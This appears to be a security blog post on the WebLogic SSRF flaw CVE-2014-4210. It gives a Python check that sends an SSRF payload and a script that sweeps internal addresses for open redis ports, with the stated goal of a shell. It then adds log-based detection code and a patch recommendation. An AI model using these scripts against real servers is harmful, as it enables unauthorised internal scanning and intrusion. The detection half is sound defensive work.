CVE-2014-4210
The Oracle WebLogic web server can be reached by external hosts and, at the same time, can itself reach internal hosts. For example, it ships a JSP page, SearchPublicRegistries.jsp, that we can use for an attack: without any authentication, it makes the WebLogic server connect to any TCP port on any host, and the verbose response lets us infer whether a service is listening on that port. (ps: I personally think this is fairly limited; if the target does not have redis on port 6379, there is no way to get a shell. Of course, that is also just my own lack of skill.)
1. weblogic_ssrf.py (can only be used to determine whether the vulnerability is present)
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    '''
    name: WebLogic SSRF vulnerability (CVE-2014-4210)
    referer: http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
    author: Lucifer
    description: in WebLogic versions 10.0.2 -- 10.3.6 the operator parameter of SearchPublicRegistries.jsp
                 accepts an internal IP address, which causes an SSRF vulnerability
    '''
    import sys
    import warnings

    import requests
    from termcolor import cprint


    class weblogic_ssrf_BaseVerify:
        def __init__(self, url):
            self.url = url

        def run(self):
            headers = {
                "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
            }
            # operator points at a URL on the server itself; a vulnerable server tries to fetch it
            # and returns a UDDI SOAP exception instead of a transport error
            payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
            vulnurl = self.url + payload
            try:
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:
                    cprint("[+] WebLogic SSRF vulnerability present...(medium)\tpayload: " + vulnurl, "yellow")
            except requests.RequestException:
                cprint("[-] " + __file__ + "====>connection timed out", "cyan")


    if __name__ == "__main__":
        warnings.filterwarnings("ignore")
        testVuln = weblogic_ssrf_BaseVerify(sys.argv[1])
        testVuln.run()
2. Use UDDI Explorer to view the internal IP range
As the figure below shows, the target's internal IP is 127.0.0.1
3. Use weblogic_redisscan.py to scan the internal network for port 6379, i.e. the redis service
    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    import http.client
    import time

    from colorama import init, Fore

    init(autoreset=True)

    # WebLogic host that relays the probes; 'xx.bbbb.com' is the placeholder used in the original
    TARGET = 'xx.bbbb.com'
    PORT = 80
    # internal /24 prefixes to sweep, taken from the address found with UDDI Explorer
    ips = ['127.0.0.']

    # the operator parameter is pointed at <ip>:6379 and the rest of the form is filled with dummy values
    PATH = ("/uddiexplorer/SearchPublicRegistries.jsp?operator={scheme}://{ip}:6379"
            "&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search")

    for j in ips:
        for i in range(1, 255):
            try:
                print(Fore.BLUE + '[-]Check ' + j + str(i))
                # first probe with operator=http://<ip>:6379
                conn = http.client.HTTPSConnection(TARGET, PORT, timeout=5)
                conn.request(method="GET", url=PATH.format(scheme="http", ip=j + str(i)))
                conn.getresponse().read()
                conn.close()
                try:
                    # second probe with operator=https://<ip>:6379; an error here is taken to mean the port is open
                    conn = http.client.HTTPSConnection(TARGET, PORT, timeout=5)
                    conn.request(method="GET", url=PATH.format(scheme="https", ip=j + str(i)))
                    conn.getresponse().read()
                    conn.close()
                    time.sleep(4)
                except Exception:
                    print(Fore.RED + '[+] ' + j + str(i) + ':6379 is open')
                    time.sleep(4)
            except Exception:
                time.sleep(4)
I tried several sites and could not find port 6379 open on any of them, so I will stop writing here. To be continued......
If you did find one, there is a redis getshell tutorial here: web安全-SSRF實戰 (Web Security: SSRF in Practice)
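From the defender's side, the two scripts above leave a very recognisable trace in the web server's access log: requests to /uddiexplorer/SearchPublicRegistries.jsp whose operator parameter points at localhost, a private address, or a non-web port such as 6379, repeated across many hosts from one client. The following detection logic is an added example written for this post; it is not code from the original author or from Oracle. The log lines, the combined-log regular expression, the classification rules and the sweep threshold are constructed assumptions, so adapt the path and the threshold to your own environment.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (NCSA combined style); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:6379&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1" 200 4871
203.0.113.7 - - [10/Oct/2023:13:55:45 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.2:6379&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1" 200 4871
203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.5:6379&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1" 200 4871
198.51.100.2 - - [10/Oct/2023:14:01:02 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://uddi.example.com/uddi/inquiry&rdoSearch=name&txtSearchname=acme&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1" 200 6012
198.51.100.2 - - [10/Oct/2023:14:01:10 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2210
"""

# client, ident, user, [timestamp], "METHOD target protocol", status, size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
SWEEP_THRESHOLD = 3  # distinct internal host:port pairs from one client before we call it a sweep (assumed value)


def classify_operator(operator):
    """Return a reason string if the operator URL looks like an SSRF probe, else None."""
    try:
        parts = urlsplit(operator)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return "unparseable operator"
    if parts.scheme not in ("http", "https"):
        return "non-http scheme %r" % parts.scheme
    host = parts.hostname
    if host is None:
        return "missing host"
    if host == "localhost":
        return "loopback host"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None  # a DNS name; only the port can give it away
    if addr is not None and (addr.is_private or addr.is_loopback or addr.is_link_local):
        return "internal address %s" % addr
    if port not in (None, 80, 443):
        return "non-web port %d" % port
    return None


def parse_line(line):
    """Split one combined-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"client": m.group("client"), "ts": m.group("ts"), "path": path,
            "query": parse_qs(query, keep_blank_values=True), "status": m.group("status")}


def detect_ssrf_probes(log_text):
    """Return (alerts, sweeps): one alert per suspicious request, and per-client sweep summaries."""
    alerts = []
    targets_by_client = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != UDDI_PATH:
            continue
        for operator in rec["query"].get("operator", []):  # parse_qs has already URL-decoded the value
            reason = classify_operator(operator)
            if reason is None:
                continue
            alerts.append({"client": rec["client"], "ts": rec["ts"], "operator": operator, "reason": reason})
            parts = urlsplit(operator)
            targets_by_client[rec["client"]].add((parts.hostname, parts.port))
    # a client that probed several distinct internal host:port pairs is sweeping, as the scanner above does
    sweeps = {client: sorted(targets, key=lambda t: (t[0], t[1] or 0))
              for client, targets in targets_by_client.items()
              if len(targets) >= SWEEP_THRESHOLD}
    return alerts, sweeps


if __name__ == "__main__":
    found, sweeping = detect_ssrf_probes(SAMPLE_LOG)
    for a in found:
        print("[ALERT] %s %s operator=%s (%s)" % (a["ts"], a["client"], a["operator"], a["reason"]))
    for client, targets in sweeping.items():
        print("[SWEEP] %s probed %d internal targets: %s" % (client, len(targets), targets))
```

On the constructed sample this raises four alerts, all from 203.0.113.7, and reports that client as a sweep because it touched four distinct internal targets; the legitimate UDDI lookup from 198.51.100.2 against a public registry is left alone. In practice the same rule can be expressed in whatever log pipeline you run, and the immediate mitigation is to apply Oracle's patch or block external access to the uddiexplorer application.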
Reference links:
[1] http://www.sohu.com/a/210792763_100014967
[2] http://www.tiaozhanziwo.com/archives/777.html